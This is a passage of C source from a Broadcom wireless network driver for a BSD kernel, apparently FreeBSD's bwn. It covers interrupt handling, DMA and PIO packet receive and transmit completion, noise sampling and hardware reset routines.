IEEE80211_M_IBSS) pretbtt = 2; else pretbtt = (mac->mac_phy.type == BWN_PHYTYPE_A) ? 120 : 250; bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PRETBTT, pretbtt); BWN_WRITE_2(mac, BWN_TSF_CFP_PRETBTT, pretbtt); } static int bwn_intr(void *arg) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; uint32_t reason; if (mac->mac_status < BWN_MAC_STATUS_STARTED || (sc->sc_flags & BWN_FLAG_INVALID)) return (FILTER_STRAY); reason = BWN_READ_4(mac, BWN_INTR_REASON); if (reason == 0xffffffff) /* shared IRQ */ return (FILTER_STRAY); reason &= mac->mac_intr_mask; if (reason == 0) return (FILTER_HANDLED); mac->mac_reason[0] = BWN_READ_4(mac, BWN_DMA0_REASON) & 0x0001dc00; mac->mac_reason[1] = BWN_READ_4(mac, BWN_DMA1_REASON) & 0x0000dc00; mac->mac_reason[2] = BWN_READ_4(mac, BWN_DMA2_REASON) & 0x0000dc00; mac->mac_reason[3] = BWN_READ_4(mac, BWN_DMA3_REASON) & 0x0001dc00; mac->mac_reason[4] = BWN_READ_4(mac, BWN_DMA4_REASON) & 0x0000dc00; BWN_WRITE_4(mac, BWN_INTR_REASON, reason); BWN_WRITE_4(mac, BWN_DMA0_REASON, mac->mac_reason[0]); BWN_WRITE_4(mac, BWN_DMA1_REASON, mac->mac_reason[1]); BWN_WRITE_4(mac, BWN_DMA2_REASON, mac->mac_reason[2]); BWN_WRITE_4(mac, BWN_DMA3_REASON, mac->mac_reason[3]); BWN_WRITE_4(mac, BWN_DMA4_REASON, mac->mac_reason[4]); /* Disable interrupts. */ BWN_WRITE_4(mac, BWN_INTR_MASK, 0); mac->mac_reason_intr = reason; BWN_BARRIER(mac, BUS_SPACE_BARRIER_READ); BWN_BARRIER(mac, BUS_SPACE_BARRIER_WRITE); taskqueue_enqueue_fast(sc->sc_tq, &mac->mac_intrtask); return (FILTER_HANDLED); } static void bwn_intrtask(void *arg, int npending) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; uint32_t merged = 0; int i, tx = 0, rx = 0; BWN_LOCK(sc); if (mac->mac_status < BWN_MAC_STATUS_STARTED || (sc->sc_flags & BWN_FLAG_INVALID)) { BWN_UNLOCK(sc); return; } for (i = 0; i < N(mac->mac_reason); i++) merged |= mac->mac_reason[i]; if (mac->mac_reason_intr & BWN_INTR_MAC_TXERR) device_printf(sc->sc_dev, "MAC trans error\n"); if (mac->mac_reason_intr & BWN_INTR_PHY_TXERR) { DPRINTF(sc, BWN_DEBUG_INTR, "%s: PHY trans error\n", __func__); mac->mac_phy.txerrors--; if (mac->mac_phy.txerrors == 0) { mac->mac_phy.txerrors = BWN_TXERROR_MAX; bwn_restart(mac, "PHY TX errors"); } } if (merged & (BWN_DMAINTR_FATALMASK | BWN_DMAINTR_NONFATALMASK)) { if (merged & BWN_DMAINTR_FATALMASK) { device_printf(sc->sc_dev, "Fatal DMA error: %#x %#x %#x %#x %#x %#x\n", mac->mac_reason[0], mac->mac_reason[1], mac->mac_reason[2], mac->mac_reason[3], mac->mac_reason[4], mac->mac_reason[5]); bwn_restart(mac, "DMA error"); BWN_UNLOCK(sc); return; } if (merged & BWN_DMAINTR_NONFATALMASK) { device_printf(sc->sc_dev, "DMA error: %#x %#x %#x %#x %#x %#x\n", mac->mac_reason[0], mac->mac_reason[1], mac->mac_reason[2], mac->mac_reason[3], mac->mac_reason[4], mac->mac_reason[5]); } } if (mac->mac_reason_intr & BWN_INTR_UCODE_DEBUG) bwn_intr_ucode_debug(mac); if (mac->mac_reason_intr & BWN_INTR_TBTT_INDI) bwn_intr_tbtt_indication(mac); if (mac->mac_reason_intr & BWN_INTR_ATIM_END) bwn_intr_atim_end(mac); if (mac->mac_reason_intr & BWN_INTR_BEACON) bwn_intr_beacon(mac); if (mac->mac_reason_intr & BWN_INTR_PMQ) bwn_intr_pmq(mac); if (mac->mac_reason_intr & BWN_INTR_NOISESAMPLE_OK) bwn_intr_noise(mac); if (mac->mac_flags & BWN_MAC_FLAG_DMA) { if (mac->mac_reason[0] & BWN_DMAINTR_RX_DONE) { bwn_dma_rx(mac->mac_method.dma.rx); rx = 1; } } else rx = bwn_pio_rx(&mac->mac_method.pio.rx); KASSERT(!(mac->mac_reason[1] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[2] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[3] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[4] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); KASSERT(!(mac->mac_reason[5] & BWN_DMAINTR_RX_DONE), ("%s", __func__)); if (mac->mac_reason_intr & BWN_INTR_TX_OK) { bwn_intr_txeof(mac); tx = 1; } BWN_WRITE_4(mac, BWN_INTR_MASK, mac->mac_intr_mask); if (sc->sc_blink_led != NULL && sc->sc_led_blink) { int evt = BWN_LED_EVENT_NONE; if (tx && rx) { if (sc->sc_rx_rate > sc->sc_tx_rate) evt = BWN_LED_EVENT_RX; else evt = BWN_LED_EVENT_TX; } else if (tx) { evt = BWN_LED_EVENT_TX; } else if (rx) { evt = BWN_LED_EVENT_RX; } else if (rx == 0) { evt = BWN_LED_EVENT_POLL; } if (evt != BWN_LED_EVENT_NONE) bwn_led_event(mac, evt); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0) { if (!IFQ_IS_EMPTY(&ifp->if_snd)) bwn_start_locked(ifp); } BWN_BARRIER(mac, BUS_SPACE_BARRIER_READ); BWN_BARRIER(mac, BUS_SPACE_BARRIER_WRITE); BWN_UNLOCK(sc); } static void bwn_restart(struct bwn_mac *mac, const char *msg) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (mac->mac_status < BWN_MAC_STATUS_INITED) return; device_printf(sc->sc_dev, "HW reset: %s\n", msg); ieee80211_runtask(ic, &mac->mac_hwreset); } static void bwn_intr_ucode_debug(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint16_t reason; if (mac->mac_fw.opensource == 0) return; reason = bwn_shm_read_2(mac, BWN_SCRATCH, BWN_DEBUGINTR_REASON_REG); switch (reason) { case BWN_DEBUGINTR_PANIC: bwn_handle_fwpanic(mac); break; case BWN_DEBUGINTR_DUMP_SHM: device_printf(sc->sc_dev, "BWN_DEBUGINTR_DUMP_SHM\n"); break; case BWN_DEBUGINTR_DUMP_REGS: device_printf(sc->sc_dev, "BWN_DEBUGINTR_DUMP_REGS\n"); break; case BWN_DEBUGINTR_MARKER: device_printf(sc->sc_dev, "BWN_DEBUGINTR_MARKER\n"); break; default: device_printf(sc->sc_dev, "ucode debug unknown reason: %#x\n", reason); } bwn_shm_write_2(mac, BWN_SCRATCH, BWN_DEBUGINTR_REASON_REG, BWN_DEBUGINTR_ACK); } static void bwn_intr_tbtt_indication(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; if (ic->ic_opmode != IEEE80211_M_HOSTAP) bwn_psctl(mac, 0); if (ic->ic_opmode == IEEE80211_M_IBSS) mac->mac_flags |= BWN_MAC_FLAG_DFQVALID; } static void bwn_intr_atim_end(struct bwn_mac *mac) { if (mac->mac_flags & BWN_MAC_FLAG_DFQVALID) { BWN_WRITE_4(mac, BWN_MACCMD, BWN_READ_4(mac, BWN_MACCMD) | BWN_MACCMD_DFQ_VALID); mac->mac_flags &= ~BWN_MAC_FLAG_DFQVALID; } } static void bwn_intr_beacon(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t cmd, beacon0, beacon1; if (ic->ic_opmode == IEEE80211_M_HOSTAP || ic->ic_opmode == IEEE80211_M_MBSS) return; mac->mac_intr_mask &= ~BWN_INTR_BEACON; cmd = BWN_READ_4(mac, BWN_MACCMD); beacon0 = (cmd & BWN_MACCMD_BEACON0_VALID); beacon1 = (cmd & BWN_MACCMD_BEACON1_VALID); if (beacon0 && beacon1) { BWN_WRITE_4(mac, BWN_INTR_REASON, BWN_INTR_BEACON); mac->mac_intr_mask |= BWN_INTR_BEACON; return; } if (sc->sc_flags & BWN_FLAG_NEED_BEACON_TP) { sc->sc_flags &= ~BWN_FLAG_NEED_BEACON_TP; bwn_load_beacon0(mac); bwn_load_beacon1(mac); cmd = BWN_READ_4(mac, BWN_MACCMD); cmd |= BWN_MACCMD_BEACON0_VALID; BWN_WRITE_4(mac, BWN_MACCMD, cmd); } else { if (!beacon0) { bwn_load_beacon0(mac); cmd = BWN_READ_4(mac, BWN_MACCMD); cmd |= BWN_MACCMD_BEACON0_VALID; BWN_WRITE_4(mac, BWN_MACCMD, cmd); } else if (!beacon1) { bwn_load_beacon1(mac); cmd = BWN_READ_4(mac, BWN_MACCMD); cmd |= BWN_MACCMD_BEACON1_VALID; BWN_WRITE_4(mac, BWN_MACCMD, cmd); } } } static void bwn_intr_pmq(struct bwn_mac *mac) { uint32_t tmp; while (1) { tmp = BWN_READ_4(mac, BWN_PS_STATUS); if (!(tmp & 0x00000008)) break; } BWN_WRITE_2(mac, BWN_PS_STATUS, 0x0002); } static void bwn_intr_noise(struct bwn_mac *mac) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; uint16_t tmp; uint8_t noise[4]; uint8_t i, j; int32_t average; if (mac->mac_phy.type != BWN_PHYTYPE_G) return; KASSERT(mac->mac_noise.noi_running, ("%s: fail", __func__)); *((uint32_t *)noise) = htole32(bwn_jssi_read(mac)); if (noise[0] == 0x7f || noise[1] == 0x7f || noise[2] == 0x7f || noise[3] == 0x7f) goto new; KASSERT(mac->mac_noise.noi_nsamples < 8, ("%s:%d: fail", __func__, __LINE__)); i = mac->mac_noise.noi_nsamples; noise[0] = MIN(MAX(noise[0], 0), N(pg->pg_nrssi_lt) - 1); noise[1] = MIN(MAX(noise[1], 0), N(pg->pg_nrssi_lt) - 1); noise[2] = MIN(MAX(noise[2], 0), N(pg->pg_nrssi_lt) - 1); noise[3] = MIN(MAX(noise[3], 0), N(pg->pg_nrssi_lt) - 1); mac->mac_noise.noi_samples[i][0] = pg->pg_nrssi_lt[noise[0]]; mac->mac_noise.noi_samples[i][1] = pg->pg_nrssi_lt[noise[1]]; mac->mac_noise.noi_samples[i][2] = pg->pg_nrssi_lt[noise[2]]; mac->mac_noise.noi_samples[i][3] = pg->pg_nrssi_lt[noise[3]]; mac->mac_noise.noi_nsamples++; if (mac->mac_noise.noi_nsamples == 8) { average = 0; for (i = 0; i < 8; i++) { for (j = 0; j < 4; j++) average += mac->mac_noise.noi_samples[i][j]; } average = (((average / 32) * 125) + 64) / 128; tmp = (bwn_shm_read_2(mac, BWN_SHARED, 0x40c) / 128) & 0x1f; if (tmp >= 8) average += 2; else average -= 25; average -= (tmp == 8) ? 72 : 48; mac->mac_stats.link_noise = average; mac->mac_noise.noi_running = 0; return; } new: bwn_noise_gensample(mac); } static int bwn_pio_rx(struct bwn_pio_rxqueue *prq) { struct bwn_mac *mac = prq->prq_mac; struct bwn_softc *sc = mac->mac_sc; unsigned int i; BWN_ASSERT_LOCKED(sc); if (mac->mac_status < BWN_MAC_STATUS_STARTED) return (0); for (i = 0; i < 5000; i++) { if (bwn_pio_rxeof(prq) == 0) break; } if (i >= 5000) device_printf(sc->sc_dev, "too many RX frames in PIO mode\n"); return ((i > 0) ? 1 : 0); } static void bwn_dma_rx(struct bwn_dma_ring *dr) { int slot, curslot; KASSERT(!dr->dr_tx, ("%s:%d: fail", __func__, __LINE__)); curslot = dr->get_curslot(dr); KASSERT(curslot >= 0 && curslot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); slot = dr->dr_curslot; for (; slot != curslot; slot = bwn_dma_nextslot(dr, slot)) bwn_dma_rxeof(dr, &slot); bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); dr->set_curslot(dr, slot); dr->dr_curslot = slot; } static void bwn_intr_txeof(struct bwn_mac *mac) { struct bwn_txstatus stat; uint32_t stat0, stat1; uint16_t tmp; BWN_ASSERT_LOCKED(mac->mac_sc); while (1) { stat0 = BWN_READ_4(mac, BWN_XMITSTAT_0); if (!(stat0 & 0x00000001)) break; stat1 = BWN_READ_4(mac, BWN_XMITSTAT_1); stat.cookie = (stat0 >> 16); stat.seq = (stat1 & 0x0000ffff); stat.phy_stat = ((stat1 & 0x00ff0000) >> 16); tmp = (stat0 & 0x0000ffff); stat.framecnt = ((tmp & 0xf000) >> 12); stat.rtscnt = ((tmp & 0x0f00) >> 8); stat.sreason = ((tmp & 0x001c) >> 2); stat.pm = (tmp & 0x0080) ? 1 : 0; stat.im = (tmp & 0x0040) ? 1 : 0; stat.ampdu = (tmp & 0x0020) ? 1 : 0; stat.ack = (tmp & 0x0002) ? 1 : 0; bwn_handle_txeof(mac, &stat); } } static void bwn_hwreset(void *arg, int npending) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; int error = 0; int prev_status; BWN_LOCK(sc); prev_status = mac->mac_status; if (prev_status >= BWN_MAC_STATUS_STARTED) bwn_core_stop(mac); if (prev_status >= BWN_MAC_STATUS_INITED) bwn_core_exit(mac); if (prev_status >= BWN_MAC_STATUS_INITED) { error = bwn_core_init(mac); if (error) goto out; } if (prev_status >= BWN_MAC_STATUS_STARTED) bwn_core_start(mac); out: if (error) { device_printf(sc->sc_dev, "%s: failed (%d)\n", __func__, error); sc->sc_curmac = NULL; } BWN_UNLOCK(sc); } static void bwn_handle_fwpanic(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint16_t reason; reason = bwn_shm_read_2(mac, BWN_SCRATCH, BWN_FWPANIC_REASON_REG); device_printf(sc->sc_dev,"fw panic (%u)\n", reason); if (reason == BWN_FWPANIC_RESTART) bwn_restart(mac, "ucode panic"); } static void bwn_load_beacon0(struct bwn_mac *mac) { KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } static void bwn_load_beacon1(struct bwn_mac *mac) { KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } static uint32_t bwn_jssi_read(struct bwn_mac *mac) { uint32_t val = 0; val = bwn_shm_read_2(mac, BWN_SHARED, 0x08a); val <<= 16; val |= bwn_shm_read_2(mac, BWN_SHARED, 0x088); return (val); } static void bwn_noise_gensample(struct bwn_mac *mac) { uint32_t jssi = 0x7f7f7f7f; bwn_shm_write_2(mac, BWN_SHARED, 0x088, (jssi & 0x0000ffff)); bwn_shm_write_2(mac, BWN_SHARED, 0x08a, (jssi & 0xffff0000) >> 16); BWN_WRITE_4(mac, BWN_MACCMD, BWN_READ_4(mac, BWN_MACCMD) | BWN_MACCMD_BGNOISE); } static int bwn_dma_freeslot(struct bwn_dma_ring *dr) { BWN_ASSERT_LOCKED(dr->dr_mac->mac_sc); return (dr->dr_numslots - dr->dr_usedslot); } static int bwn_dma_nextslot(struct bwn_dma_ring *dr, int slot) { BWN_ASSERT_LOCKED(dr->dr_mac->mac_sc); KASSERT(slot >= -1 && slot <= dr->dr_numslots - 1, ("%s:%d: fail", __func__, __LINE__)); if (slot == dr->dr_numslots - 1) return (0); return (slot + 1); } static void bwn_dma_rxeof(struct bwn_dma_ring *dr, int *slot) { struct bwn_mac *mac = dr->dr_mac; struct bwn_softc *sc = mac->mac_sc; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_rxhdr4 *rxhdr; struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; uint32_t macstat; int32_t tmp; int cnt = 0; uint16_t len; dr->getdesc(dr, *slot, &desc, &meta); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_POSTREAD); m = meta->mt_m; if (bwn_dma_newbuf(dr, desc, meta, 0)) { ifp->if_ierrors++; return; } rxhdr = mtod(m, struct bwn_rxhdr4 *); len = le16toh(rxhdr->frame_len); if (len <= 0) { ifp->if_ierrors++; return; } if (bwn_dma_check_redzone(dr, m)) { device_printf(sc->sc_dev, "redzone error.\n"); bwn_dma_set_redzone(dr, m); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_PREWRITE); return; } if (len > dr->dr_rx_bufsize) { tmp = len; while (1) { dr->getdesc(dr, *slot, &desc, &meta); bwn_dma_set_redzone(dr, meta->mt_m); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_PREWRITE); *slot = bwn_dma_nextslot(dr, *slot); cnt++; tmp -= dr->dr_rx_bufsize; if (tmp <= 0) break; } device_printf(sc->sc_dev, "too small buffer " "(len %u buffer %u dropped %d)\n", len, dr->dr_rx_bufsize, cnt); return; } macstat = le32toh(rxhdr->mac_status); if (macstat & BWN_RX_MAC_FCSERR) { if (!(mac->mac_sc->sc_filters & BWN_MACCTL_PASS_BADFCS)) { device_printf(sc->sc_dev, "RX drop\n"); return; } } m->m_pkthdr.rcvif = ifp; m->m_len = m->m_pkthdr.len = len + dr->dr_frameoffset; m_adj(m, dr->dr_frameoffset); bwn_rxeof(dr->dr_mac, m, rxhdr); } static void bwn_handle_txeof(struct bwn_mac *mac, const struct bwn_txstatus *status) { struct bwn_dma_ring *dr; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_pio_txqueue *tq; struct bwn_pio_txpkt *tp = NULL; struct bwn_softc *sc = mac->mac_sc; struct bwn_stats *stats = &mac->mac_stats; struct ieee80211_node *ni; struct ieee80211vap *vap; int retrycnt = 0, slot; BWN_ASSERT_LOCKED(mac->mac_sc); if (status->im) device_printf(sc->sc_dev, "TODO: STATUS IM\n"); if (status->ampdu) device_printf(sc->sc_dev, "TODO: STATUS AMPDU\n"); if (status->rtscnt) { if (status->rtscnt == 0xf) stats->rtsfail++; else stats->rts++; } if (mac->mac_flags & BWN_MAC_FLAG_DMA) { if (status->ack) { dr = bwn_dma_parse_cookie(mac, status, status->cookie, &slot); if (dr == NULL) { device_printf(sc->sc_dev, "failed to parse cookie\n"); return; } while (1) { dr->getdesc(dr, slot, &desc, &meta); if (meta->mt_islast) { ni = meta->mt_ni; vap = ni->ni_vap; ieee80211_ratectl_tx_complete(vap, ni, status->ack ? IEEE80211_RATECTL_TX_SUCCESS : IEEE80211_RATECTL_TX_FAILURE, &retrycnt, 0); break; } slot = bwn_dma_nextslot(dr, slot); } } bwn_dma_handle_txeof(mac, status); } else { if (status->ack) { tq = bwn_pio_parse_cookie(mac, status->cookie, &tp); if (tq == NULL) { device_printf(sc->sc_dev, "failed to parse cookie\n"); return; } ni = tp->tp_ni; vap = ni->ni_vap; ieee80211_ratectl_tx_complete(vap, ni, status->ack ? IEEE80211_RATECTL_TX_SUCCESS : IEEE80211_RATECTL_TX_FAILURE, &retrycnt, 0); } bwn_pio_handle_txeof(mac, status); } bwn_phy_txpower_check(mac, 0); } static uint8_t bwn_pio_rxeof(struct bwn_pio_rxqueue *prq) { struct bwn_mac *mac = prq->prq_mac; struct bwn_softc *sc = mac->mac_sc; struct bwn_rxhdr4 rxhdr; struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; uint32_t ctl32, macstat, v32; unsigned int i, padding; uint16_t ctl16, len, totlen, v16; unsigned char *mp; char *data; memset(&rxhdr, 0, sizeof(rxhdr)); if (prq->prq_rev >= 8) { ctl32 = bwn_pio_rx_read_4(prq, BWN_PIO8_RXCTL); if (!(ctl32 & BWN_PIO8_RXCTL_FRAMEREADY)) return (0); bwn_pio_rx_write_4(prq, BWN_PIO8_RXCTL, BWN_PIO8_RXCTL_FRAMEREADY); for (i = 0; i < 10; i++) { ctl32 = bwn_pio_rx_read_4(prq, BWN_PIO8_RXCTL); if (ctl32 & BWN_PIO8_RXCTL_DATAREADY) goto ready; DELAY(10); } } else { ctl16 = bwn_pio_rx_read_2(prq, BWN_PIO_RXCTL); if (!(ctl16 & BWN_PIO_RXCTL_FRAMEREADY)) return (0); bwn_pio_rx_write_2(prq, BWN_PIO_RXCTL, BWN_PIO_RXCTL_FRAMEREADY); for (i = 0; i < 10; i++) { ctl16 = bwn_pio_rx_read_2(prq, BWN_PIO_RXCTL); if (ctl16 & BWN_PIO_RXCTL_DATAREADY) goto ready; DELAY(10); } } device_printf(sc->sc_dev, "%s: timed out\n", __func__); return (1); ready: if (prq->prq_rev >= 8) siba_read_multi_4(sc->sc_dev, &rxhdr, sizeof(rxhdr), prq->prq_base + BWN_PIO8_RXDATA); else siba_read_multi_2(sc->sc_dev, &rxhdr, sizeof(rxhdr), prq->prq_base + BWN_PIO_RXDATA); len = le16toh(rxhdr.frame_len); if (len > 0x700) { device_printf(sc->sc_dev, "%s: len is too big\n", __func__); goto error; } if (len == 0) { device_printf(sc->sc_dev, "%s: len is 0\n", __func__); goto error; } macstat = le32toh(rxhdr.mac_status); if (macstat & BWN_RX_MAC_FCSERR) { if (!(mac->mac_sc->sc_filters & BWN_MACCTL_PASS_BADFCS)) { device_printf(sc->sc_dev, "%s: FCS error", __func__); goto error; } } padding = (macstat & BWN_RX_MAC_PADDING) ? 2 : 0; totlen = len + padding; KASSERT(totlen <= MCLBYTES, ("too big..\n")); m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { device_printf(sc->sc_dev, "%s: out of memory", __func__); goto error; } mp = mtod(m, unsigned char *); if (prq->prq_rev >= 8) { siba_read_multi_4(sc->sc_dev, mp, (totlen & ~3), prq->prq_base + BWN_PIO8_RXDATA); if (totlen & 3) { v32 = bwn_pio_rx_read_4(prq, BWN_PIO8_RXDATA); data = &(mp[totlen - 1]); switch (totlen & 3) { case 3: *data = (v32 >> 16); data--; case 2: *data = (v32 >> 8); data--; case 1: *data = v32; } } } else { siba_read_multi_2(sc->sc_dev, mp, (totlen & ~1), prq->prq_base + BWN_PIO_RXDATA); if (totlen & 1) { v16 = bwn_pio_rx_read_2(prq, BWN_PIO_RXDATA); mp[totlen - 1] = v16; } } m->m_pkthdr.rcvif = ifp; m->m_len = m->m_pkthdr.len = totlen; bwn_rxeof(prq->prq_mac, m, &rxhdr); return (1); error: if (prq->prq_rev >= 8) bwn_pio_rx_write_4(prq, BWN_PIO8_RXCTL, BWN_PIO8_RXCTL_DATAREADY); else bwn_pio_rx_write_2(prq, BWN_PIO_RXCTL, BWN_PIO_RXCTL_DATAREADY); return (1); } static int bwn_dma_newbuf(struct bwn_dma_ring *dr, struct bwn_dmadesc_generic *desc, struct bwn_dmadesc_meta *meta, int init) { struct bwn_mac *mac = dr->dr_mac; struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_rxhdr4 *hdr; bus_dmamap_t map; bus_addr_t paddr; struct mbuf *m; int error; m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { error = ENOBUFS; /* * If the NIC is up and running, we need to: * - Clear RX buffer's header. * - Restore RX descriptor settings. */ if (init) return (error); else goto back; } m->m_len = m->m_pkthdr.len = MCLBYTES; bwn_dma_set_redzone(dr, m); /* * Try to load RX buf into temporary DMA map */ error = bus_dmamap_load_mbuf(dma->rxbuf_dtag, dr->dr_spare_dmap, m, bwn_dma_buf_addr, &paddr, BUS_DMA_NOWAIT); if (error) { m_freem(m); /* * See the comment above */ if (init) return (error); else goto back; } if (!init) bus_dmamap_unload(dma->rxbuf_dtag, meta->mt_dmap); meta->mt_m = m; meta->mt_paddr = paddr; /* * Swap RX buf's DMA map with the loaded temporary one */ map = meta->mt_dmap; meta->mt_dmap = dr->dr_spare_dmap; dr->dr_spare_dmap = map; back: /* * Clear RX buf header */ hdr = mtod(meta->mt_m, struct bwn_rxhdr4 *); bzero(hdr, sizeof(*hdr)); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_PREWRITE); /* * Setup RX buf descriptor */ dr->setdesc(dr, desc, meta->mt_paddr, meta->mt_m->m_len - sizeof(*hdr), 0, 0, 0); return (error); } static void bwn_dma_buf_addr(void *arg, bus_dma_segment_t *seg, int nseg, bus_size_t mapsz __unused, int error) { if (!error) { KASSERT(nseg == 1, ("too many segments(%d)\n", nseg)); *((bus_addr_t *)arg) = seg->ds_addr; } } static int bwn_hwrate2ieeerate(int rate) { switch (rate) { case BWN_CCK_RATE_1MB: return (2); case BWN_CCK_RATE_2MB: return (4); case BWN_CCK_RATE_5MB: return (11); case BWN_CCK_RATE_11MB: return (22); case BWN_OFDM_RATE_6MB: return (12); case BWN_OFDM_RATE_9MB: return (18); case BWN_OFDM_RATE_12MB: return (24); case BWN_OFDM_RATE_18MB: return (36); case BWN_OFDM_RATE_24MB: return (48); case BWN_OFDM_RATE_36MB: return (72); case BWN_OFDM_RATE_48MB: return (96); case BWN_OFDM_RATE_54MB: return (108); default: printf("Ooops\n"); return (0); } } static void bwn_rxeof(struct bwn_mac *mac, struct mbuf *m, const void *_rxhdr) { const struct bwn_rxhdr4 *rxhdr = _rxhdr; struct bwn_plcp6 *plcp; struct bwn_softc *sc = mac->mac_sc; struct ieee80211_frame_min *wh; struct ieee80211_node *ni; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t macstat; int padding, rate, rssi = 0, noise = 0, type; uint16_t phytype, phystat0, phystat3, chanstat; unsigned char *mp = mtod(m, unsigned char *); static int rx_mac_dec_rpt = 0; BWN_ASSERT_LOCKED(sc); phystat0 = le16toh(rxhdr->phy_status0); phystat3 = le16toh(rxhdr->phy_status3); macstat = le32toh(rxhdr->mac_status); chanstat = le16toh(rxhdr->channel); phytype = chanstat & BWN_RX_CHAN_PHYTYPE; if (macstat & BWN_RX_MAC_FCSERR) device_printf(sc->sc_dev, "TODO RX: RX_FLAG_FAILED_FCS_CRC\n"); if (phystat0 & (BWN_RX_PHYST0_PLCPHCF | BWN_RX_PHYST0_PLCPFV)) device_printf(sc->sc_dev, "TODO RX: RX_FLAG_FAILED_PLCP_CRC\n"); if (macstat & BWN_RX_MAC_DECERR) goto drop; padding = (macstat & BWN_RX_MAC_PADDING) ? 2 : 0; if (m->m_pkthdr.len < (sizeof(struct bwn_plcp6) + padding)) { device_printf(sc->sc_dev, "frame too short (length=%d)\n", m->m_pkthdr.len); goto drop; } plcp = (struct bwn_plcp6 *)(mp + padding); m_adj(m, sizeof(struct bwn_plcp6) + padding); if (m->m_pkthdr.len < IEEE80211_MIN_LEN) { device_printf(sc->sc_dev, "frame too short (length=%d)\n", m->m_pkthdr.len); goto drop; } wh = mtod(m, struct ieee80211_frame_min *); if (macstat & BWN_RX_MAC_DEC && rx_mac_dec_rpt++ < 50) device_printf(sc->sc_dev, "RX decryption attempted (old %d keyidx %#x)\n", BWN_ISOLDFMT(mac), (macstat & BWN_RX_MAC_KEYIDX) >> BWN_RX_MAC_KEYIDX_SHIFT); /* XXX calculating RSSI & noise & antenna */ if (phystat0 & BWN_RX_PHYST0_OFDM) rate = bwn_plcp_get_ofdmrate(mac, plcp, phytype == BWN_PHYTYPE_A); else rate = bwn_plcp_get_cckrate(mac, plcp); if (rate == -1) { if (!(mac->mac_sc->sc_filters & BWN_MACCTL_PASS_BADPLCP)) goto drop; } sc->sc_rx_rate = bwn_hwrate2ieeerate(rate); /* RX radio tap */ if (ieee80211_radiotap_active(ic)) bwn_rx_radiotap(mac, m, rxhdr, plcp, rate, rssi, noise); m_adj(m, -IEEE80211_CRC_LEN); rssi = rxhdr->phy.abg.rssi; /* XXX incorrect RSSI calculation? */ noise = mac->mac_stats.link_noise; ifp->if_ipackets++; BWN_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, wh); if (ni != NULL) { type = ieee80211_input(ni, m, rssi, noise); ieee80211_free_node(ni); } else type = ieee80211_input_all(ic, m, rssi, noise); BWN_LOCK(sc); return; drop: device_printf(sc->sc_dev, "%s: dropped\n", __func__); } static void bwn_dma_handle_txeof(struct bwn_mac *mac, const struct bwn_txstatus *status) { struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_softc *sc = mac->mac_sc; struct ieee80211_node *ni; struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; int slot; BWN_ASSERT_LOCKED(sc); dr = bwn_dma_parse_cookie(mac, status, status->cookie, &slot); if (dr == NULL) { device_printf(sc->sc_dev, "failed to parse cookie\n"); return; } KASSERT(dr->dr_tx, ("%s:%d: fail", __func__, __LINE__)); while (1) { KASSERT(slot >= 0 && slot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); dr->getdesc(dr, slot, &desc, &meta); if (meta->mt_txtype == BWN_DMADESC_METATYPE_HEADER) bus_dmamap_unload(dr->dr_txring_dtag, meta->mt_dmap); else if (meta->mt_txtype == BWN_DMADESC_METATYPE_BODY) bus_dmamap_unload(dma->txbuf_dtag, meta->mt_dmap); if (meta->mt_islast) { KASSERT(meta->mt_m != NULL, ("%s:%d: fail", __func__, __LINE__)); ni = meta->mt_ni; m = meta->mt_m; if (ni != NULL) { /* * Do any tx complete callback. Note this must * be done before releasing the node reference. */ if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, 0); ieee80211_free_node(ni); meta->mt_ni = NULL; } m_freem(m); meta->mt_m = NULL; } else { KASSERT(meta->mt_m == NULL, ("%s:%d: fail", __func__, __LINE__)); } dr->dr_usedslot--; if (meta->mt_islast) { ifp->if_opackets++; break; } slot = bwn_dma_nextslot(dr, slot); } sc->sc_watchdog_timer = 0; if (dr->dr_stop) 